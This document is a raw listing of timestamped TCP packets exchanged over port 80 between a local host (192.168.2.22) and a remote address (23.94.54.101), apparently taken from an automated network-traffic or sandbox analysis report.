May 2, 2024 17:39:46.660126925 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.660161018 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660221100 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660265923 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.660300016 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660379887 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660490036 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660520077 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.660574913 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660619020 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.660665035 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660747051 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660789013 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.660801888 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660870075 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.660927057 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.660963058 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661045074 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661091089 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661154032 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.661166906 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661210060 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.661245108 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661339998 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661385059 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.661410093 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661470890 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661514997 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.661549091 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661647081 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661689997 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.661744118 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661843061 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.661890984 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.661914110 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662000895 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662045002 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.662097931 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662163973 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662208080 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.662255049 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662312984 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662365913 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662391901 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.662405968 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662450075 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.662628889 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662705898 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662792921 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662812948 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662885904 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.662946939 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663043022 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663105011 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.663115978 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663165092 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663212061 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663223028 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.663275957 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663319111 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.663400888 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663465023 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663501024 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663518906 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.663554907 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663594961 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.663603067 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663646936 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663692951 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.663717031 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663758993 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.663805962 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.663878918 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664135933 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664179087 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.664202929 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664314032 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664347887 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.664381981 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664475918 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664516926 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.664591074 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664659023 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664702892 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.664716959 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664768934 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664830923 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.664841890 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664885998 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.664927959 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.664935112 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665030956 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665064096 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.665122032 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665185928 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665226936 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.665265083 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665349007 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665399075 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.665460110 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665508032 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665560961 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.665595055 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665679932 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665714979 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665774107 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665802956 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.665873051 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.665910959 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.665994883 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666062117 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666105032 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.666115999 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666166067 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666201115 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666208029 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.666282892 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666326046 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.666354895 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666443110 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666481972 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.666538000 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666728020 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666769981 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.666915894 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666959047 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.666976929 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.667002916 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.667146921 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.667190075 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.667233944 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.667248011 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.667299032 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.667334080 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.667459011 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.667501926 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.667560101 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.667637110 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.667685986 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.667916059 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.667977095 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.668009996 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.668020010 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.668087959 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.668133974 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.668134928 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.668201923 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.668247938 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.668260098 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.668286085 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.668328047 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.668351889 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.668450117 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.668503046 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.668632030 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669179916 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669222116 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.669380903 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669444084 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669481993 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.669517040 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669569969 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669610977 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.669645071 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669709921 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669749975 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.669806004 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669899940 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.669946909 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.669961929 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670027018 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670067072 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.670142889 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670192957 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670233011 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.670262098 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670314074 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670365095 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.670398951 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670443058 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670485020 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.670509100 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670572996 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670614004 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.670664072 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670756102 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670778990 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670803070 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.670838118 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.670877934 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.672919989 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.672962904 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.673002958 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.675157070 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.763915062 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764024019 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764075041 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764089108 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764170885 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764214039 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764238119 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764250994 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764285088 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764307022 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764362097 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764403105 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764413118 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764427900 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764465094 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764467955 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764482021 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764503956 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764522076 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764544964 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764588118 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764590025 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764602900 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764631987 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764642954 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764643908 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764686108 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764695883 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764719009 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764750004 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764756918 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764780998 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764794111 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764821053 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764858961 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764870882 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764897108 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764902115 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764935017 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764936924 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.764950991 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764972925 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.764990091 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.765014887 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.765050888 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.765054941 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.765064955 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.765086889 CEST  80  49161  23.94.54.101  192.168.2.22
May 2, 2024 17:39:46.765104055 CEST  49161  80  192.168.2.22  23.94.54.101
May 2, 2024 17:39:46.765139103 CEST  80  49161  23.94.54.101  192.168.2.22
                                        May 2, 2024 17:39:46.765151024 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765162945 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765183926 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765218019 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765260935 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765276909 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765300035 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765312910 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765340090 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765352011 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765376091 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765398026 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765402079 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765409946 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765435934 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765460968 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765503883 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765513897 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765527010 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765538931 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765549898 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765567064 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765573025 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765587091 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765598059 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765639067 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765655994 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765678883 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765712023 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765718937 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765747070 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765789032 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765791893 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765921116 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.765963078 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.765997887 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766057014 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766098976 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766133070 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766216040 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766222954 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766278028 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766319990 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766343117 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766366959 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766390085 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766407013 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766429901 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766468048 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766490936 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766541004 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766554117 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766581059 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766640902 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766685963 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766736984 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766757011 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766792059 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766799927 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766829014 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766872883 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766892910 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766917944 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766958952 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.766961098 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.766974926 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767011881 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767018080 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767033100 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767045975 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767088890 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767097950 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767102003 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767126083 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767177105 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767189980 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767200947 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767213106 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767220020 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767239094 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767251015 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767252922 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767283916 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767299891 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767323017 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767334938 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767362118 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767388105 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767399073 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767579079 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767631054 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767666101 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767690897 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767704010 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767714024 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767724991 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767744064 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767757893 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767784119 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767796040 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767834902 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.767910957 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767968893 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767981052 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.767992973 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.768003941 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.768007994 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.768028975 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.768049002 CEST804916123.94.54.101192.168.2.22
